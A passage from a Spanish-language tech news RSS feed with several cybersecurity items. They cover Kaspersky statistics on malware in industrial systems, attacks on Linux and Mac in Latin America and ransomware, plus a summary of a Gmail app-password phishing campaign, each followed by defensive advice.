<p>La ciberseguridad en entornos industriales ha dejado de ser una preocupación futura para convertirse en una realidad crítica del presente. Así lo confirma el más reciente análisis de Kaspersky ICS CERT, que muestra que el 20.1% de los sistemas industriales fue atacado con malware en el tercer trimestre de 2025, después de haber alcanzado el 21.9% en el primer trimestre del año. Aunque se observa una ligera mejora, la cifra sigue evidenciando una presión constante sobre infraestructuras esenciales para sectores como la energía, la manufactura, el transporte y la logística.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101575,"sizeSlug":"large","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-large"><img src="https://www.todoenunclick.com/wp-content/uploads/2026/01/image-4-642x283.gif" alt="" class="wp-image-101575" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Los datos confirman que los incidentes digitales ya no representan únicamente un riesgo tecnológico, sino una amenaza directa para la continuidad operativa. En un entorno industrial cada vez más conectado, un solo ataque puede traducirse en paradas de producción, retrasos en la cadena de suministro y pérdidas económicas significativas, además de generar riesgos para la seguridad de personas e instalaciones.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Lejos de tratarse de un fenómeno aislado, el informe refleja un cambio estructural en el panorama de amenazas. Los atacantes han ampliado su enfoque y ya no se limitan a explotar vulnerabilidades técnicas. Cada vez con mayor frecuencia utilizan relaciones de confianza, cadenas de suministro y proveedores críticos como vía de acceso a redes industriales que anteriormente se consideraban bien protegidas. Este tipo de incidentes multiplica el impacto de un ataque, ya que una brecha en un solo proveedor puede afectar a decenas de organizaciones de manera simultánea.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La magnitud del problema se refleja también en la exposición desigual de los distintos sectores industriales. En 2025, los sistemas de biometría encabezaron la lista con un 27.4% de equipos ICS afectados por intentos de ataque, seguidos por la automatización de edificios con un 23.5%, el sector eléctrico con un 21.3%, la ingeniería e integración OT con un 21.2 %, la construcción con un 21.1%, la manufactura con un 17.3% y el petróleo y gas con un 15.8%. Estas cifras confirman que no se trata de riesgos aislados, sino de una presión sostenida sobre todos los sectores considerados críticos.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":101576,"sizeSlug":"large","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-large"><img src="https://www.todoenunclick.com/wp-content/uploads/2026/01/image-5-455x336.gif" alt="" class="wp-image-101576" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>Uno de los factores que más ha influido en esta evolución ha sido la incorporación acelerada de inteligencia artificial en las campañas maliciosas. Durante el último año se ha observado un crecimiento significativo de operaciones basadas en agentes autónomos, capaces de adaptarse y desplazarse dentro de redes industriales con mayor rapidez. Esta dinámica ha reducido los tiempos de detección y ha ampliado el alcance de los ataques, incrementando la presión sobre los equipos responsables de la seguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A este escenario se suma el aumento de ataques contra sistemas industriales conectados a Internet, especialmente en plantas e instalaciones ubicadas en zonas remotas. Muchas de estas infraestructuras fueron diseñadas en un momento en que no estaban pensadas para estar expuestas al mundo digital y hoy operan con medidas de protección que ya no responden a la realidad actual. Esto las deja más vulnerables frente a ataques que se originan desde cualquier parte del mundo y que se ejecutan de forma automática y constante. A medida que las fábricas, las plantas de energía y los sistemas de transporte se vuelven más conectados, también crece el número de puertas por las que un atacante puede intentar acceder.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Las organizaciones industriales se enfrentan a un entorno en el que los ataques son más rápidos, más inteligentes y más asimétricos que nunca. Estas ofensivas demuestran que tanto las cadenas de suministro multinacionales como los ecosistemas técnicos locales están en riesgo, por ello, toda empresa industrial debe asumir que ya es un objetivo y actuar en consecuencia”,</em> recomienda <strong>Andrea Fernández, gerente general para la región Sur de América Latina en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar las amenazas a los sistemas industriales, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Realizar evaluaciones periódicas de seguridad </strong>para identificar y corregir posibles vulnerabilidades de ciberseguridad.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Establecer procesos continuos de evaluación y priorización de vulnerabilidades</strong> como base de una gestión eficaz del riesgo. Soluciones especializadas como <a href="https://latam.kaspersky.com/enterprise-security/industrial-cybersecurity">Kaspersky Industrial CyberSecurity</a> pueden convertirse en un apoyo clave y en una fuente de información práctica que no siempre está disponible en el dominio público.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Actualizar oportunamente los componentes críticos de la red industrial.</strong> Aplicar parches de seguridad o implementar medidas compensatorias tan pronto como sea técnicamente posible resulta fundamental para prevenir incidentes graves que podrían generar pérdidas millonarias por la interrupción de la producción.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilizar soluciones EDR</strong>, como <a href="https://latam.kaspersky.com/enterprise-security/endpoint-detection-response-edr">Kaspersky Next EDR Expert</a>, para la detección oportuna de amenazas avanzadas, la investigación de incidentes y una respuesta más eficaz.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Fortalecer las capacidades de los equipos en prevención, detección y respuesta frente a incidentes.</strong> La capacitación especializada para el personal de TI y de operaciones es una de las medidas más importantes para mejorar la preparación de las organizaciones.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/ciberseguridad-industrial-ataques-mas-rapidos-mas-inteligentes-e-inevitables/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101574</post-id>	</item>
		<item>
		<title>Más de 726 mil ciberataques a sistemas Linux y más de 431 mil a Mac en Latam</title>
		<link>https://www.todoenunclick.com/mas-de-726-mil-ciberataques-a-sistemas-linux-y-mas-de-431-mil-a-mac-en-latam/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Thu, 11 Dec 2025 16:27:00 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Appel]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[LATAM]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Sistemas]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101455</guid>

					<description><![CDATA[<p><img width="2560" height="1709" src="https://www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=2560&amp;ssl=1 2560w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=1536%2C1025&amp;ssl=1 1536w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=2048%2C1367&amp;ssl=1 2048w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?resize=681%2C455&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Linux-y-Mac-Panorama-2025-scaled.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 2560px) 100vw, 2560px" /></p><!-- wp:paragraph -->
<p><strong>Kaspersky advierte un aumento constante de ataques contra sistemas usados en trabajo, servidores y dispositivos personales.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>América Latina se ha consolidado como una de las regiones más impactadas por los ciberataques dirigidos a sistemas Linux y Mac, según el Panorama de Amenazas de Kaspersky. Entre agosto de 2024 y julio de 2025, se registraron 726 mil ataques bloqueados en sistemas Linux, lo que representa un promedio de 2 mil ataques diarios en la región.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En el caso de los computadores de Apple con sistema Mac, se contabilizaron 431.811 ataques, con un promedio de 1.183 intentos de ataque por día. A continuación, se detallan los países más afectados, los tipos de amenazas más frecuentes y recomendaciones para mantenerse protegido.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre el periodo mencionado, <strong>Argentina</strong> registró 32 mil&nbsp; ataques bloqueados en sistemas Linux. En cuanto a los sistemas Mac, se detectaron 9600 intentos de ataque, lo que refleja el interés creciente de los ciberdelincuentes en este tipo de dispositivos en el país.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Entre los países más impactados por ataques a sistemas Linux en la región se encuentran Brasil (385 mil), Chile (116 mil), México (100 mil), Colombia (67 mil) y Perú (42 mil). Por su parte, los ataques dirigidos a sistemas Mac afectaron principalmente a Brasil (180 mil), México (84 mil), Ecuador (35 mil), Colombia (33 mil) y Perú (33 mil).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Fabio Assolini, director del Equipo Global de Investigación y Análisis de Kaspersky para América Latina, explica:</strong> <em>“Antes se creía que estos sistemas eran inherentemente más seguros, pero esa premisa ya no se sostiene frente a la sofisticación de los atacantes. El alto uso de Linux en infraestructuras críticas, servidores y dispositivos IoT lo convierte en un objetivo clave. De igual forma, la creciente popularidad de los computadores Apple con sistema Mac atrae la atención de los ciberdelincuentes”.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Es fundamental que empresas, organismos públicos y usuarios adopten una postura proactiva en materia de seguridad. La protección no es opcional, sino una necesidad constante. Mantener los sistemas actualizados, utilizar soluciones confiables y emplear contraseñas seguras siguen siendo medidas básicas pero esenciales</em>”, <strong>concluye Assolini.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky ofrece algunos consejos sencillos para proteger sus sistemas:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Mantenga las actualizaciones más recientes:</strong> Instale siempre las actualizaciones de su sistema operativo (Linux, Mac) y de los programas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Contraseñas fuertes y únicas:</strong> Evite contraseñas débiles y fáciles de adivinar. Use contraseñas complejas y no repita la misma contraseña en varios lugares. Los <a href="https://latam.kaspersky.com/password-manager">gestores de contraseñas</a> pueden ayudar.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Use un firewall:</strong> Es una barrera que impide accesos no autorizados a su computadora.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utilice una solución de seguridad integral:</strong> Elija una <a href="https://latam.kaspersky.com/premium">solución de seguridad confiable</a> que ofrezca protección contra malware, exploits y otras amenazas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Monitoree los registros del sistema:</strong> Revise los registros automáticos de las actividades del equipo para identificar comportamientos sospechosos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Aprenda sobre seguridad:</strong> Infórmese sobre las nuevas amenazas y cómo protegerse.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/mas-de-726-mil-ciberataques-a-sistemas-linux-y-mas-de-431-mil-a-mac-en-latam/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101455</post-id>	</item>
		<item>
		<title>Ataques de ransomware superan 1,1 millones de intentos en América Latina, según Kaspersky</title>
		<link>https://www.todoenunclick.com/ataques-de-ransomware-superan-11-millones-de-intentos-en-america-latina-segun-kaspersky/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Mon, 06 Oct 2025 19:02:57 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[América Latina]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Phobos]]></category>
		<category><![CDATA[Ransomware]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101212</guid>

					<description><![CDATA[<p><img width="1280" height="853" src="https://www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/10/Panorama-Ransomware-Latam.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></p><!-- wp:paragraph -->
<p>El Panorama de Amenazas de Kaspersky 2025 revela que América Latina registró una disminución del 7% en los ataques de ransomware en comparación con el año anterior. En los últimos 12 meses, entre agosto de 2024 y junio de 2025, la región llegó a registrar más de 1,1 millones de intentos – alrededor de 3,000 al día, con un promedio de 2 ataques por minuto. Brasil lidera el ranking con 549 mil registros, seguido por México (237 mil), Chile (43 mil), Ecuador (37 mil) y Colombia (35 mil), conformando el top 5 de países más afectados por esta ciberamenaza. Por detrás, se ubican Perú (25 mil), Panamá (22 mil) y Argentina (16 mil).</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Uno de los motivos de la caída en los ataques de ransomware en la región fue la detención del grupo cibercriminal Phobos. Durante la operación policial se interceptaron más de 100 servidores que formaban parte de la red criminal, desmantelando su infraestructura. El grupo Phobos era responsable de una de las familias de ransomware más activas, que figuraba entre las cinco que más afectaban a usuarios en América Latina, alcanzando al 4.44% de las organizaciones de la región.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Si bien todos los países de América Latina –excepto Brasil (+12%)– mostraron una reducción en el número de ataques de ransomware, la región aún enfrenta un escenario preocupante. Son 3 mil ataques al día y 2 por minuto de un tipo de amenaza que bloquea el acceso a datos críticos y exige rescates, generando potenciales perjuicios financieros y reputacionales para las organizaciones –desde empresas hasta entidades gubernamentales. No debemos interpretar cualquier disminución en los ataques como un alivio, sino como una advertencia para reforzar la prevención ante las tácticas cada vez más sofisticadas de los cibercriminales”,</em> <strong>destacó Fabio Assolini, director del Equipo Global de Investigación y Análisis de Kaspersky para América Latina.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los daños no se limitan a gobiernos. Empresas de todos los tamaños y sectores son objetivos constantes, y los impactos pueden ser devastadores. Los ataques de ransomware ya han llevado a compañías centenarias a cerrar sus puertas y han hecho que empresas de salud, por ejemplo, quiebren tras filtraciones masivas de datos, comprometiendo información sensible y la confianza del público. Organizaciones de tecnología, bases de datos públicas e incluso empresas mixtas también pueden verse afectadas, evidenciando la fragilidad de modelos de negocio complejos frente a ciberincidentes.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar este tipo de infecciones por ransomware, Kaspersky recomienda:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Mantener todos los programas actualizados, tanto en los dispositivos (computadoras, celulares, tabletas) como en los servidores. De esta forma, se evita que los cibercriminales exploten fallas del sistema para invadir la red de la empresa.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Para prevenir filtraciones de datos, seguir las normas internas: nunca compartir o enviar información sensible sin autorización y reportar de inmediato cualquier actividad sospechosa al equipo de TI o de seguridad. Utilizar únicamente los sistemas y herramientas oficiales de la empresa para acceder o transferir datos.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Realizar copias de seguridad (backups) y mantenerlas seguras y fuera de línea, protegidas con contraseña, cifrado y control de acceso. Así, incluso en caso de ataque, la empresa puede recuperar sus datos rápidamente.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Activar la protección contra ransomware en todos los dispositivos de la empresa (computadoras, celulares, tabletas) para evitar que los archivos sean secuestrados o cifrados por hackers.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Instalar soluciones de seguridad, como anti-APT y <a href="https://latam.kaspersky.com/enterprise-security/xdr">EDR de Kaspersky</a>, que ayudan a identificar ataques, investigar lo ocurrido y bloquear problemas de forma rápida. Los anti-APT detectan ataques avanzados y planificados, mientras que el EDR monitorea los dispositivos, detecta problemas, investiga y ayuda a resolver incidentes.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/ataques-de-ransomware-superan-11-millones-de-intentos-en-america-latina-segun-kaspersky/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101212</post-id>	</item>
		<item>
		<title>Gmail hackeado: método ruso supera doble verificación</title>
		<link>https://www.todoenunclick.com/gmail-hackeado-metodo-ruso-supera-doble-verificacion/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Wed, 25 Jun 2025 20:09:46 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Autenticación]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[contraseñas]]></category>
		<category><![CDATA[correo]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[mfa]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[seguridad]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100750</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Gmail hackeado: método ruso supera doble verificación" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/06/image-WKgoVinlLy8UaXbhhtklt.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>La <strong>autenticación multifactor</strong> (MFA) se considera uno de los pilares fundamentales de la seguridad digital. Sin embargo, un sofisticado <strong>ataque de hackers rusos</strong> ha demostrado que incluso las cuentas de <strong>Gmail</strong> protegidas con doble autenticación pueden ser vulnerables.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según el reporte del <strong>Google Threat Intelligence Group</strong> (GTIG), este grupo de <strong>ciberdelincuentes</strong> logró acceder a cuentas de políticos y periodistas estadounidenses mediante una técnica de <strong>ingeniería social</strong> extremadamente elaborada.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><strong>Cómo funciona el ataque de suplantación</strong></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los <strong>hackers rusos</strong> desarrollaron una estrategia meticulosa que explota una vulnerabilidad específica en el sistema de <strong>contraseñas de aplicación</strong> de <strong>Gmail</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><strong>La táctica de engaño perfecta</strong></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los atacantes se hacían pasar por funcionarios estadounidenses utilizando:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Cuentas de correo falsas con dominio <strong>@state.gov</strong></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Inglés impecable y comunicación profesional</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Intercambios prolongados de correos para generar confianza</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><strong>El truco de las contraseñas de aplicación</strong></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Una vez establecida la confianza, las víctimas recibían un <strong>PDF con instrucciones detalladas</strong> que aparentemente les permitiría generar una "clave segura" para acceder a infraestructura gubernamental.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En realidad, estas instrucciones les hacían crear <strong>contraseñas de aplicación</strong> para sus propias cuentas de <strong>Gmail</strong>, entregando sin saberlo las llaves de acceso a los <strong>ciberdelincuentes</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><strong>Por qué este método es tan peligroso</strong></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Las <strong>contraseñas de aplicación</strong> representan un eslabón débil en la cadena de seguridad:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Funcionan en cualquier cliente de correo como <strong>Outlook</strong> o <strong>Thunderbird</strong></li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>No dejan rastros de actividad sospechosa en los registros de seguridad</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Permiten acceso completo sin activar alertas de <strong>Gmail</strong></li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>A diferencia de los <strong>códigos de autenticación</strong> temporales o las <strong>llaves FIDO2/WebAuthn</strong>, las contraseñas de aplicación mantienen acceso permanente hasta que se revocan manualmente.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><strong>Señales de que tu Gmail fue comprometido</strong></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Identifica estos <strong>indicadores de compromiso</strong> en tu cuenta:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Aumento significativo de <strong>spam</strong> en tu bandeja de entrada</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Correos que se marcan como leídos o se eliminan automáticamente</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Mensajes enviados desde tu cuenta sin tu conocimiento</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Contraseñas de aplicación</strong> generadas sin tu autorización</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><strong>Cómo proteger tu cuenta de Gmail</strong></h2>
<!-- /wp:heading -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><strong>Acciones inmediatas</strong></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Si sospechas que tu cuenta fue comprometida:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol class="wp-block-list"><!-- wp:list-item -->
<li><strong>Revoca todas las contraseñas de aplicación</strong> existentes desde la configuración de seguridad</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Cambia tu <strong>contraseña principal</strong> inmediatamente</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Revisa el historial de actividad de tu cuenta</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><strong>Medidas de seguridad avanzadas</strong></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Implementa estas <strong>mejores prácticas</strong> de seguridad:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Utiliza <strong>passkeys</strong> o <strong>llaves de seguridad física</strong> en lugar de códigos SMS</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Configura <strong>Google Authenticator</strong> para la autenticación de dos factores</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Evita las <strong>contraseñas de aplicación</strong> salvo cuando sea absolutamente necesario</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Mantén contraseñas únicas y complejas para cada servicio</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><strong>Principios básicos de ciberseguridad</strong></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>No olvides estos fundamentos:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Actualiza regularmente tu sistema operativo y aplicaciones</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Utiliza un <strong>antivirus</strong> confiable</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Mantén escepticismo ante correos no solicitados, especialmente de "funcionarios"</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><strong>Conclusión</strong></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Este incidente demuestra que la <strong>seguridad digital</strong> requiere múltiples capas de protección. Mientras que la <strong>autenticación multifactor</strong> sigue siendo esencial, los usuarios deben mantenerse vigilantes ante técnicas de <strong>ingeniería social</strong> cada vez más sofisticadas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La clave está en combinar herramientas de seguridad robustas con educación continua sobre las últimas amenazas <strong>cibernéticas</strong>. Solo así podremos mantenernos un paso adelante de los <strong>hackers</strong> que constantemente buscan nuevas formas de comprometer nuestras cuentas digitales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/gmail-hackeado-metodo-ruso-supera-doble-verificacion/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100750</post-id>	</item>
		<item>
		<title>Ciberataques en finanzas: 53% de empresas afectada</title>
		<link>https://www.todoenunclick.com/ciberataques-en-finanzas-53-de-empresas-afectada/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 30 Jan 2025 16:38:28 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Banca]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Cloud Legion]]></category>
		<category><![CDATA[dato]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[Finanzas]]></category>
		<category><![CDATA[fintech]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[nube]]></category>
		<category><![CDATA[Tenable]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99979</guid>

